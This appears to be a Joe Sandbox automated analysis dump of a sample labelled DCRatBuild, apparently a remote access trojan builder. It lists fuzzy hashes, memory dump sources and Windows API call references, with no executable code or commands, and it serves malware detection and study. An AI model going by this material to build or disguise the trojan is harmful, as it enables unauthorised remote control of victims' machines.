                                        • Instruction ID: 78001c07e4dcbe4a275fcb593803984cfd97e15883f1c8caf314b9f94d80985b
                                        • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                                        • Instruction Fuzzy Hash: 1E62037060878A9FC71DCF28C8805B9FBE1BF55304F14866ED9A68B742E738E955CB81
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                        • Instruction ID: 84d124c96ce23b0cd4c2aed626eca0b6addf1d10991805501dfc6097a9d980c7
                                        • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                        • Instruction Fuzzy Hash: A4523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d38bceb7875d3f878cde1ef87da084a3469c6a7d136acf51660bb3f78daef93a
                                        • Instruction ID: 66c5ac489132999353388d85dc3f111162c98fa59892d0d00d8ae427d473c5fb
                                        • Opcode Fuzzy Hash: d38bceb7875d3f878cde1ef87da084a3469c6a7d136acf51660bb3f78daef93a
                                        • Instruction Fuzzy Hash: 4F12D1B17047068BC72CCF28C9D46B9B3E1FB55308F14892EE597C7A81E778A895CB46
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ea4214791b585c4148b34b79d19b050b78bd826baf458f0fac73cc302c56056
                                        • Instruction ID: 1693cb284bd6700ab9571d56246261478605b5888055fdf9638eebff8e0c6c81
                                        • Opcode Fuzzy Hash: 2ea4214791b585c4148b34b79d19b050b78bd826baf458f0fac73cc302c56056
                                        • Instruction Fuzzy Hash: D5F199726083418FE719CF29C88496EBBE1FFC9314F148A2EF5D5A7252D738E9058B42
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: fa6fdd7136474cef660dd974c345ebdd6e145d43ce00539dde68fe890475ee84
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: 05C1A8362051930ADF2D463A89741BFBAA16A927B331A0B5DDCB3CB1C4FE58D52CD960
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: 0f022f33c3e6f9a2f09ed681bda2338f0948dac6275ac50184cc058dcc6b2ef5
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: 95C1A9362151930ADF2D463AC9741BFBBA16A917B331A076DDCB2CB0C4FE58D52CDA50
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: cefe21f49a8ae246007e27c88c2cfea1032a7aff250ad8015327d57883fbf8f7
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: CAC1A7362051530ADF1D463A89344BFBAA16EA17B231A075DDCB3CB1C5FE58E52CD990
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: f83414a0a26dc4cf527f5f767942cc1a84be7785f6c62b6f3eef4e8a8f1bfbf0
                                        • Instruction ID: 473c00bd352e6a01328dcb7f3e904df36d2be9d6d9dac6196698b504595ba711
                                        • Opcode Fuzzy Hash: f83414a0a26dc4cf527f5f767942cc1a84be7785f6c62b6f3eef4e8a8f1bfbf0
                                        • Instruction Fuzzy Hash: C4D105B1A043419FDB14CF28C88479BBBE4BF96308F04456DE8849B742D778E959CB9B
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: 02c5b7761a69de0923ec274ddc273ab4f631c9705b9ea0b6699edf5502eb5a3e
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: BDC1B7362051930ADF2D463A89344BFBBA16A927B331A076DDCB3CB1C4FE58D52CD950
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 200cf49ca22484ba9fef40d8a0ef92a8d16bb6fb58a64e6c98371764123bca88
                                        • Instruction ID: c7255c188db9eed8f3f7aa8dd06d97ecdfac573ce79068ca9b985c75160fdf44
                                        • Opcode Fuzzy Hash: 200cf49ca22484ba9fef40d8a0ef92a8d16bb6fb58a64e6c98371764123bca88
                                        • Instruction Fuzzy Hash: F8E136745187848FC304CF29D89086ABBF0BB8A340F85495EF5D987352C339EA59DBA2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                        • Instruction ID: 00f104920e3befcbe57e97562c9041256950b31cf1a24b374df641e8b0439cb0
                                        • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                        • Instruction Fuzzy Hash: DF9135B02047499BEB24EF68D8D9BBE7795EB90300F10092DE5DB872C2EB7C9645C752
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83f2a496e681089ad545972d5cdb63c32b824570997f29d00487cd4cdb013b7f
                                        • Instruction ID: 0eb5a53342389f75b5bcbefb4019aadb7b7a9b4a176cbfd78c6a2246317d8d9d
                                        • Opcode Fuzzy Hash: 83f2a496e681089ad545972d5cdb63c32b824570997f29d00487cd4cdb013b7f
                                        • Instruction Fuzzy Hash: 68615771680708A6DE788B28485ABFF3394AB4134FF104619EC82DB281D6DDEDCE8759
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                        • Instruction ID: 81f9cf68eda0d8582d3c8c247c320127074d231ec5a6bc5d1cfa91a40c2baeb1
                                        • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                        • Instruction Fuzzy Hash: AF712F717043459BEB24DE28C8D5BBD77E5AB90304F00492DE5CE8B283DB7CDA898752
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                        • Instruction ID: abac6251dd68c0b4156eb99328ac08166a29b9e552cc4ce03835bcb7db8c5423
                                        • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                        • Instruction Fuzzy Hash: 0C513771600A84A6EB384728885A7FF27C99B5734FF180949ED8297282C7DDFDCD8355
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30e612b7d53db6d510dbd84906a7af605450b7d48bf504a46e28071faf8700bc
                                        • Instruction ID: 16f61c1320f0ed521cd597880aee7979e6ff02e4da4f396b552876402af8e68b
                                        • Opcode Fuzzy Hash: 30e612b7d53db6d510dbd84906a7af605450b7d48bf504a46e28071faf8700bc
                                        • Instruction Fuzzy Hash: 0F81918221E7D89DD71A4F7C38E42F53FA15733381F1980AAC4C9862A3D17E49E8DB65
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79035cd300d17293bdeef89ab0ff51301f054c0f3359705393c794905e69caaa
                                        • Instruction ID: d122370b4781ab7ecc879aad1e87735935bda4fc656d8d6f74ce847240771e1f
                                        • Opcode Fuzzy Hash: 79035cd300d17293bdeef89ab0ff51301f054c0f3359705393c794905e69caaa
                                        • Instruction Fuzzy Hash: 1C51EF319083D58FD712CF24918456EBFE0BE9A314F49499EE4D55B283D338EA49CB93
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08a6191fd88212c77171e2a2d9fc9fb5da61ac5deeb73276ea11f671996d6cac
                                        • Instruction ID: e4dc06390fe337da434fc020def676a463a0b1197c8603d310a70d7e05ca20b4
                                        • Opcode Fuzzy Hash: 08a6191fd88212c77171e2a2d9fc9fb5da61ac5deeb73276ea11f671996d6cac
                                        • Instruction Fuzzy Hash: 52512571A083028FC748CF19D48059AF7E1FF88354F058A2EE899E7741DB34EA59CB96
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                        • Instruction ID: ef2df5c7d6c4855115dfbc669c1cb951be822b76afbf285375c1675acd9b973e
                                        • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                        • Instruction Fuzzy Hash: E431F4B16047469FDB14DF28C89666ABBE0FB95300F10492DE4D9C7342C73DEA49CBA2
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6a7f9a4115f2d99f0d119fbe89380a400c156bd791ea59819e02fd9cc3d488e
                                        • Instruction ID: 07cacf3698855e2648b2182c8ee99dda6b7fb25856278e8b8d9f4140a8a3e573
                                        • Opcode Fuzzy Hash: e6a7f9a4115f2d99f0d119fbe89380a400c156bd791ea59819e02fd9cc3d488e
                                        • Instruction Fuzzy Hash: 5621DA72A202614BCB48CF2DED9083A7751A78A311B46C22BEA46CB2D1C53DE925C7E0
                                        APIs
                                        • _swprintf.LIBCMT ref: 0073DABE
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                          • Part of subcall function 00741596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00770EE8,00000200,0073D202,00000000,?,00000050,00770EE8), ref: 007415B3
                                        • _strlen.LIBCMT ref: 0073DADF
                                        • SetDlgItemTextW.USER32(?,0076E154,?), ref: 0073DB3F
                                        • GetWindowRect.USER32(?,?), ref: 0073DB79
                                        • GetClientRect.USER32(?,?), ref: 0073DB85
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0073DC25
                                        • GetWindowRect.USER32(?,?), ref: 0073DC52
                                        • SetWindowTextW.USER32(?,?), ref: 0073DC95
                                        • GetSystemMetrics.USER32(00000008), ref: 0073DC9D
                                        • GetWindow.USER32(?,00000005), ref: 0073DCA8
                                        • GetWindowRect.USER32(00000000,?), ref: 0073DCD5
                                        • GetWindow.USER32(00000000,00000002), ref: 0073DD47
                                        Strings
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$Tv$d
                                        • API String ID: 2407758923-2527556340
                                        • Opcode ID: 2515b8638e17b63e7cbb7c7286c84e89cb424afb37709ce6b9d4e8bad997b580
                                        • Instruction ID: 974217b4630f42f6936c650a2fe6fae94325b0ba56d7bf3301b6658843e20a08
                                        • Opcode Fuzzy Hash: 2515b8638e17b63e7cbb7c7286c84e89cb424afb37709ce6b9d4e8bad997b580
                                        • Instruction Fuzzy Hash: 8181B271108305AFD720DF68DD89E6BBBE9EB88704F04491DFA8593252D778ED0ACB52
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0075C277
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE2F
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE41
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE53
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE65
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE77
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE89
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BE9B
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEAD
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEBF
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BED1
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEE3
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BEF5
                                          • Part of subcall function 0075BE12: _free.LIBCMT ref: 0075BF07
                                        • _free.LIBCMT ref: 0075C26C
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 0075C28E
                                        • _free.LIBCMT ref: 0075C2A3
                                        • _free.LIBCMT ref: 0075C2AE
                                        • _free.LIBCMT ref: 0075C2D0
                                        • _free.LIBCMT ref: 0075C2E3
                                        • _free.LIBCMT ref: 0075C2F1
                                        • _free.LIBCMT ref: 0075C2FC
                                        • _free.LIBCMT ref: 0075C334
                                        • _free.LIBCMT ref: 0075C33B
                                        • _free.LIBCMT ref: 0075C358
                                        • _free.LIBCMT ref: 0075C370
                                        Strings
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID: Pv
                                        • API String ID: 161543041-1445123177
                                        • Opcode ID: d4c1ecbba02d5ac6b30843dddc08717500b0450bb125ec45b2976773178dba2a
                                        • Instruction ID: fa7ac6cb98ec0dab014f952fd2ec1578eee410299e1a9f02c8a53f2ba673437e
                                        • Opcode Fuzzy Hash: d4c1ecbba02d5ac6b30843dddc08717500b0450bb125ec45b2976773178dba2a
                                        • Instruction Fuzzy Hash: 7D315E31500309DFEBA29E78D949BD673E5FF00312F14C429EC89E7551DFB9AC488652
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 0074CD51
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 0074CD7D
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0074CD99
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0074CDB0
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0074CDC4
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0074CDED
                                        • DeleteObject.GDI32(00000000), ref: 0074CDF4
                                        • GetWindow.USER32(00000000,00000002), ref: 0074CDFD
                                        Strings
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: 74f7322d0fb6032703f830d415b09147576dca28b0907840ee8bdb8ba4fa1ca1
                                        • Instruction ID: 70df980fcaf48df8ca70df9a2f623296ef81c5964b034464185661fdeebd6126
                                        • Opcode Fuzzy Hash: 74f7322d0fb6032703f830d415b09147576dca28b0907840ee8bdb8ba4fa1ca1
                                        • Instruction Fuzzy Hash: 4B11EB32646310BBE2327B749C4EFAF365CAB55751F008521FB42A1093DB6C891786A8
                                        APIs
                                        • _free.LIBCMT ref: 00758EC5
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 00758ED1
                                        • _free.LIBCMT ref: 00758EDC
                                        • _free.LIBCMT ref: 00758EE7
                                        • _free.LIBCMT ref: 00758EF2
                                        • _free.LIBCMT ref: 00758EFD
                                        • _free.LIBCMT ref: 00758F08
                                        • _free.LIBCMT ref: 00758F13
                                        • _free.LIBCMT ref: 00758F1E
                                        • _free.LIBCMT ref: 00758F2C
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: c985204078ce256598c87611ede7a0329dfa7f1b731ca4c9a67cfecab8e325f6
                                        • Instruction ID: 5e4debb76c24ae7ad92be88840894d762c38a272d6cb5676090d4fbe2b736cd9
                                        • Opcode Fuzzy Hash: c985204078ce256598c87611ede7a0329dfa7f1b731ca4c9a67cfecab8e325f6
                                        • Instruction Fuzzy Hash: EC11D47610114DEFCBD1EF54C846DDA3BB5FF08351B0180A0BE48AF622DA76DA559B82
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: ;%u$x%u$xc%u
                                        • API String ID: 0-2277559157
                                        • Opcode ID: fb565cc976cf151bda2060c7b4d286a47c13c292a2b0a638995f1fd05241014b
                                        • Instruction ID: ec02c0035a030bf749bbac8f1d0f9d759d31561595140e5436a6582daa74d104
                                        • Opcode Fuzzy Hash: fb565cc976cf151bda2060c7b4d286a47c13c292a2b0a638995f1fd05241014b
                                        • Instruction Fuzzy Hash: CCF10771604340DBFB25EF34889ABFE77957F90300F084579F9869B283DA6C9949C7A2
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074AD20
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0074AD47
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0074AD60
                                        • SetWindowTextW.USER32(?,?), ref: 0074AD71
                                        • GetDlgItem.USER32(?,00000065), ref: 0074AD7A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0074AD8E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0074ADA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
